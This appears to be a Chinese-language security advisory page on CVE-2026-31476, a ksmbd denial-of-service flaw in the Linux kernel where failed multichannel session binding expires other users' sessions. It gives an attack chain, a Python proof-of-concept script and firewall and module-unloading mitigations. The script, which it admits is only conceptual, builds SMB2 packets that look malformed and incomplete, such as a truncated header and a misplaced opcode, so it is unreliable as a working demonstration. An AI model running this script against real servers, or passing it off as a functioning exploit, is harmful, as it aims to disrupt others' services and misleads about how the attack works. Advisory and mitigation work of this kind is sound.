CVE-2026-31476: Linux Kernel ksmbd会话过期拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-31476

漏洞类型

拒绝服务

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的ksmbd模块在处理多通道会话绑定请求时存在安全漏洞。当绑定请求因认证失败（例如密码错误）时，错误处理路径无条件地将会话状态设置为SMB2_SESSION_EXPIRED。由于该会话是通过慢速路径查找的，属于其他连接的合法用户，攻击者可以无需认证即可发送恶意请求使任意活动会话失效，从而导致拒绝服务。

技术细节

该漏洞位于Linux内核的ksmbd（SMB服务器）组件中，涉及多通道会话绑定逻辑。在处理SMB2_SESSION_SETUP请求时，如果认证失败，代码会执行错误处理路径。关键问题在于，此时sess指针指向的是通过ksmbd_session_lookup_slowpath()获取的已存在会话，该会话属于系统中另一个已建立连接的用户，而非当前请求的连接。错误的逻辑将这个无辜会话的状态标记为SMB2_SESSION_EXPIRED，导致合法用户连接被强制中断。尽管引用计数ksmbd_user_session_put()随后被正确释放，但会话状态已被破坏。由于攻击无需用户交互（UI:N）且无需认证（PR:N），远程攻击者可利用此漏洞轻易破坏服务的可用性。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描网络，识别开启TCP 445端口并运行ksmbd服务的Linux主机。

STEP 2

步骤2: 发送恶意请求

攻击者向目标主机发送特制的SMB2_SESSION_SETUP请求，模拟多通道绑定，并故意使用错误的密码触发认证失败。

STEP 3

步骤3: 触发漏洞逻辑

ksmbd在处理失败请求时，错误地通过慢速路径查找会话并将其状态设置为SMB2_SESSION_EXPIRED。

STEP 4

步骤4: 拒绝服务

目标用户的活跃会话被强制失效，连接中断，导致合法用户无法访问服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-31476: ksmbd Session Expiration DoS
# This script demonstrates sending a malformed binding request to invalidate a session.
# Note: This is a conceptual demonstration based on the vulnerability description.

import socket
import struct

def send_malformed_smb_packet(target_ip, target_port=445):
    """
    Sends a specially crafted SMB2 SESSION_SETUP request to trigger the binding failure.
    """
    try:
        # Establish TCP connection
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        
        # SMB2 Negotiate Protocol Request (Simplified header)
        smb2_header = b'\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        
        # Send Negotiate to setup session context
        sock.send(smb2_header)
        sock.recv(1024) # Receive response

        # Craft SMB2 SESSION_SETUP Request for Binding
        # Structure: NetBIOS Session Service + SMB2 Header + Session Setup Request
        # Intentionally use wrong password/credentials to trigger the error path
        session_setup_req = struct.pack('<I', 64) # NetBIOS length
        session_setup_req += b'\x00' * 4 # SMB2 Header credits etc.
        session_setup_req += struct.pack('<H', 0x01) # OpCode: SESSION_SETUP
        session_setup_req += b'\x00' * (64 - len(session_setup_req)) # Padding
        
        # In a real exploit, specific flags and Session ID would be set to target a specific user
        print(f"[*] Sending malformed binding request to {target_ip}...")
        sock.send(session_setup_req)
        
        print("[+] Packet sent. If vulnerable, the target session should be expired.")
        sock.close()
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.10" # Replace with target IP
    send_malformed_smb_packet(target)

影响范围

Linux Kernel (ksmbd enabled) prior to commit 1d1888b4a7aec518b707f6eca0bf08992c0e8da3

Linux Kernel (ksmbd enabled) prior to commit 6fafc4c4238e538969f1375f9ecdc6587c53f1cc

防御指南

临时缓解措施

在应用官方补丁之前，建议通过防火墙规则严格限制对SMB服务端口（TCP 445）的访问来源，仅允许受信任的内部网络通信。如果环境允许，可以临时在系统中通过modprobe -r ksmbd卸载该模块以彻底消除攻击面。